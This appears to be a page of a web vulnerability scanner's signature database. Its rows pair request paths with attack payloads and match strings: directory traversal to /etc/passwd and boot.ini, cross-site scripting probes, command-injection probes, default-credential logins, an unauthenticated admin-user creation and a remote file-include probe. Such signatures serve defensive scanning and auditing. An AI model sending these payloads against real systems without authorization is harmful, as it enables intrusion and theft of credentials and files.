scan_database.db

来自「Ubuntu packages of security software。 相」· DB 代码 · 共 422 行 · 第 1/5 页

"apache","/test/jsp/pageIsErrorPage.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
"apache","/test/jsp/pageIsThreadSafe.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
"apache","/test/jsp/pageSession.jsp","Internal Servlet","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
"apache","/test/realPath.jsp","WEBROOT","GET","Apache Tomcat default file found which reveals the web root. The /test directory should be removed."
"apache","/tomcat-docs/index.html","200","GET","Default Apache Tomcat documentation found."
"apache","/webtop/wdk/samples/dumpRequest.jsp?J=%3Cscript%3Ealert('Vulnerable');%3C/script%3Ef","<script>alert('Vulnerable');</script>","GET","Documentum Webtop (Tomcat 4.1) is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"apache","/webtop/wdk/samples/index.jsp","WDK Fusion Samples","GET","Documentum Webtop Example Code"
"apache","/XSQLConfig.xml","200","GET","Oracle 9iAS configuration file found - see bugrtraq #4290."
"cern","@CGIDIRS.www_acl","200","GET","Contains authorization information"
"cern","@CGIDIRS.wwwacl","200","GET","Contains authorization information"
"cern","@CGIDIRSls"," neither '/","GET","The CERN server lets attackers view the host's path. Should be upgraded to Apache, as CERN is not maintained."
"cern","/.www_acl","200","GET","Contains authorization information"
"cern","/.wwwacl","200","GET","Contains authorization information"
"citrix","/applist.asp","200","GET","Citrix server may allow remote users to view applications installed without authenticating."
"citrix","/boilerplate.asp?NFuse_Template=.../.../.../.../.../.../.../.../.../boot.ini&NFuse_CurrentFolder=/","boot loader","GET","Citrix CGI allows directory traversal."
"compaq","/proxy/ssllogin?user=administrator&password=administrator",">administrator<","GET","Compaq Web-Based Management allows login with id/pass 'administrator'/'administrator'."
"compaq","/proxy/ssllogin?user=administrator&password=operator",">operator<","GET","Compaq Web-Based Management allows login with id/pass 'operator'/'operator'."
"compaq","/proxy/ssllogin?user=administrator&password=user",">user<","GET","Compaq Web-Based Management allows login with id/pass 'user'/'user'."
"compaq","/Survey/Survey.Htm","System Components","GET","This Compaq device, without authentication, gives lots of system information."
"compaq","/WEBAGENT/CQMGSERV/CF-SINFO.TPF","General Information","GET","This Compaq device, without authentication, gives lots of system information. Load all the pages at /WEBAGENT/FINDEX.TPL"
"compaq","http://127.0.0.1:2301/ HTTP/1.0","Compaq WBEM Device","GET","The Compaq WBEM interface can act as an HTTP proxy, which can allow firewall or web proxy bypass. http://www.compaq.com/products/servers/management/SSRT0758.html"
"dwhttpd","/ab2/\@AdminAddadmin?uid=foo&password=bar&re_password=bar","200","GET","Sun Answerbook may allow users to be created without proper authentication first. Attempted to add user 'foo' with password 'bar'."
"dwhttpd","/ab2/\@AdminViewError","200","GET","Sun Answerbook allows viewing of the error logs without authentication."
"generic","../../../../../../../../../../etc/*","passwd","GET","Charles Steinkuehler's LEAF sh-httpd allows remote users to read any file or directory on the system."
"generic","../../../../../../../../../../etc/passw*","root:","GET","Charles Steinkuehler's LEAF sh-httpd allows remote users to read any file or directory on the system."
"generic","@ADMINDIRSconfig.php","200","GET","PHP Config file may contain database IDs and passwords."
"generic","@CGIDIRS.access","200","GET","Contains authorization information"
"generic","@CGIDIRS.cobalt","200","GET","May allow remote admin of CGI scripts."
"generic","@CGIDIRS.cobalt/alert/service.cgi?service=<h1>Hello!</h1><script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02"
"generic","@CGIDIRS.cobalt/alert/service.cgi?service=<img%20src=javascript:alert('Vulnerable')>","javascript:alert('Vulnerable')","GET","Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","@CGIDIRS.cobalt/alert/service.cgi?service=<script>alert('Vulnerable')</script>","<script>alert('Vulnerable')</script>","GET","Cobalt RaQ 4 administration CGI is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","@CGIDIRS.htaccess.old","200","GET","Backup/Old copy of .htaccess - Contains authorization information"
"generic","@CGIDIRS.htaccess.save","200","GET","Backup/Old copy of .htaccess - Contains authorization information"
"generic","@CGIDIRS.htaccess","200","GET","Contains authorization information"
"generic","@CGIDIRS.htaccess~","200","GET","Backup/Old copy of .htaccess - Contains authorization information"
"generic","@CGIDIRS.htpasswd","200","GET","Contains authorization information"
"generic","@CGIDIRS.namazu.cgi","200","GET","Namazu search engine found. Vulnerable to CSS attacks (fixed 2001-11-25). Attacker could write arbitrary files outside docroot (fixed 2000-01-26). CA-2000-02."
"generic","@CGIDIRS.passwd","200","GET","Contains authorization information"
"generic","@CGIDIRS","Index of ","GET","Directory indexing of CGI directory should be disabled."
"generic","@CGIDIRS/htsearch?exclude=%60/etc/passwd%60","Unable to read word database file '","GET","htsearch may reveal file system paths."
"generic","@CGIDIRS%2e%2e/abyss.conf","200","GET","The Abyss configuration file was successfully retrieved. Upgrade with the latest version/patches for 1.0 from http://www.aprelium.com/"
"generic","@CGIDIRS14all-1.1.cgi?cfg=../../../../../../../../etc/passwd","root:","GET","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version."
"generic","@CGIDIRS14all.cgi?cfg=../../../../../../../../etc/passwd","root:","GET","Multi Router Traffic Grapher (mrtg.org) is vulnerable to a 'show files' vulnerability. Software should be upgraded to the latest version."
"generic","@CGIDIRSa1disp3.cgi?../../../../../../../../../../etc/passwd","root:","GET","This CGI allows attackers read arbitrary files on the host."
"generic","@CGIDIRSa1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd","root:","GET","This CGI allows attackers read arbitrary files on the host."
"generic","@CGIDIRSa1stats/a1disp3.cgi?../../../../../../../etc/passwd","root:","GET","Remote file retrieval."
"generic","@CGIDIRSa1stats/a1disp4.cgi?../../../../../../../etc/passwd","root:","GET","Remote file retrieval."
"generic","@CGIDIRSaddbanner.cgi","200","GET","This CGI may allow attackers to read any file on the system."
"generic","@CGIDIRSadmin.cgi?list=../../../../../../../../../../etc/passwd","root:","GET","Add2it Mailman Free V1.73 allows arbitrary files to be retrieved."
"generic","@CGIDIRSaf.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd","root:","GET","AlienForm2 revision 1.5 allows any file to be read from the remote system."
"generic","@CGIDIRSaglimpse.cgi","200","GET","This CGI may allow attackers to execute remote commands."
"generic","@CGIDIRSaglimpse","200","GET","This CGI may allow attackers to execute remote commands."
"generic","@CGIDIRSAlbum?mode=album&album=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc&dispsize=640&start=0","resolv.conf","GET","This CGI allows attackers to view arbitrary files on the host."
"generic","@CGIDIRSalibaba.pl|dir%20..\\..\\..\\..\\..\\..\\..\\,","boot.ini","GET","This CGI allows attackers to execute arbitrary commands on the server."
"generic","@CGIDIRSalienform.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd","root:","GET","AlienForm2 revision 1.5 allows any file to be read from the remote system."
"generic","@CGIDIRSanacondaclip.pl?template=../../../../../../../../../../etc/passwd","root:","GET","This allows attackers to read arbitrary files from the server."
"generic","@CGIDIRSans.pl?p=../../../../../usr/bin/id|&blah","uid","GET","Avenger's News System allows commands to be issued remotely."
"generic","@CGIDIRSans/ans.pl?p=../../../../../usr/bin/id|&blah","uid","GET","Avenger's News System allows commands to be issued remotely."
"generic","@CGIDIRSapexec.pl?etype=odp&template=../../../../../../../../../../etc/passwd%00.html&passurl=/category/","root:","GET","This allows attackers to read arbitrary files from the server. CVE-2000-0975. BID-2338."
"generic","@CGIDIRSarchitext_query.cgi","200","GET","Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands."
"generic","@CGIDIRSarchitext_query.pl","200","GET","Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands."
"generic","@CGIDIRSash","200","GET","Shell found in CGI dir!"
"generic","@CGIDIRSastrocam.cgi","200","GET","Astrocam 1.4.1 contained buffer overflow BID-4684. Prior to 2.1.3 contained unspecified security bugs"
"generic","@CGIDIRSAT-admin.cgi","200","GET","Admin interface...no known holes"
"generic","@CGIDIRSathcgi.exe?command=showpage&script='],[0,0]];alert('Vulnerable');a=[['","<script>alert('Vulnerable')</script>","GET","Authoria HR Suite is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","@CGIDIRSatk/javascript/class.atkdateattribute.js.php?config_atkroot=http://xxxxxxxxxx/","http://xxxxxxxxxx/atk/","GET","Achievo can be made to include php files from another domain. Upgrade to a new version."
"generic","@CGIDIRSauction/auction.cgi?action=Sort_Page&View=Search&Page=0&Cat_ID=&Lang=English&Search=All&Terms=<script>alert('Vulnerable');</script>&Where=&Sort=Photo&Dir=","<script>alert('Vulnerable')</script>","GET","Mewsoft Auction 3.0 from http://www.mewsoft.com/ is vulnerable to Cross Site Scripting (XSS). CA-2000-02."
"generic","@CGIDIRSauktion.cgi?menue=../../../../../../../../../../etc/passwd","root:","GET","The CGI allows attackers to read arbitrary files remotely."
"generic","@CGIDIRSauth_data/auth_user_file.txt","200","GET","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information."
"generic","@CGIDIRSawstats.pl","Traffic","GET","Free realtime logfile analyzer for advanced web statistics. Should be protected."
"generic","@CGIDIRSawstats/awstats.pl","Traffic","GET","Free realtime logfile analyzer for advanced web statistics. Should be protected."
"generic","@CGIDIRSbadmin.cgi","200","GET","BannerWheel v1.0 is vulnerable to a local buffer overflow. If this is version 1.0 it should be upgrade."
"generic","@CGIDIRSbanner.cgi","200","GET","This CGI may allow attackers to read any file on the system."
"generic","@CGIDIRSbannereditor.cgi","200","GET","This CGI may allow attackers to read any file on the system."
"generic","@CGIDIRSbash","200","GET","Shell found in CGI dir!"
"generic","@CGIDIRSbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","root:","GET","The PHPNuke admin.php is vulnerable to a remote file retrieval vul. It should be upgraded to the latest version. CAN-2001-0320"
"generic","@CGIDIRSbb-hist?HISTFILE=../../../../../../../../../../etc/passwd","root:","GET","Versions 1.09b or1.09c of BigBrother allow attackers to read arbitrary files."
"generic","@CGIDIRSbb-hist.sh?HISTFILE=../../../../../../../../../../etc/passwd","root:","GET","Versions 1.09b or1.09c of BigBrother allow attackers to read arbitrary files."
"generic","@CGIDIRSbb-hostsvc.sh?HOSTSVC=../../../../../../../../../../etc/passwd","root:","GET","Versions of BigBrother 1.4h or older allow attackers to read arbitrary files on the system."
"generic","@CGIDIRSbetsie/parserl.pl/<script>alert('Vulnerable')</script>;","<script>alert('Vulnerable')</script>","GET","BBC Education Text to Speech Internet Enhancer from http://www.bbc.co.uk/education/betsie/ allows Cross Site Scripting (XSS). CA-2000-02."
"generic","@CGIDIRSbigconf.cgi?command=view_textfile&file=/etc/passwd&filters=","root:","GET","This CGI allows attackers to read arbitrary files on the host."
"generic","@CGIDIRSbizdb1-search.cgi","200","GET","This CGI may allow attackers to execute commands remotely. See http://www.hack.co.za/daem0n/cgi/cgi/bizdb.htm"
"generic","@CGIDIRSblog/","200","GET","Movable Type weblog found. May contain security problems in CGIs, weak passwords, and more. Default login 'Melody' with password 'Nelson'."
"generic","@CGIDIRSblog/mt-check.cgi","200","GET","Movable Type weblog diagnostic script found. Reveals docroot path, operating system, perl version, and modules."
"generic","@CGIDIRSblog/mt-load.cgi","200","GET","Movable Type weblog installation CGI found. May be able to reconfigure or reload."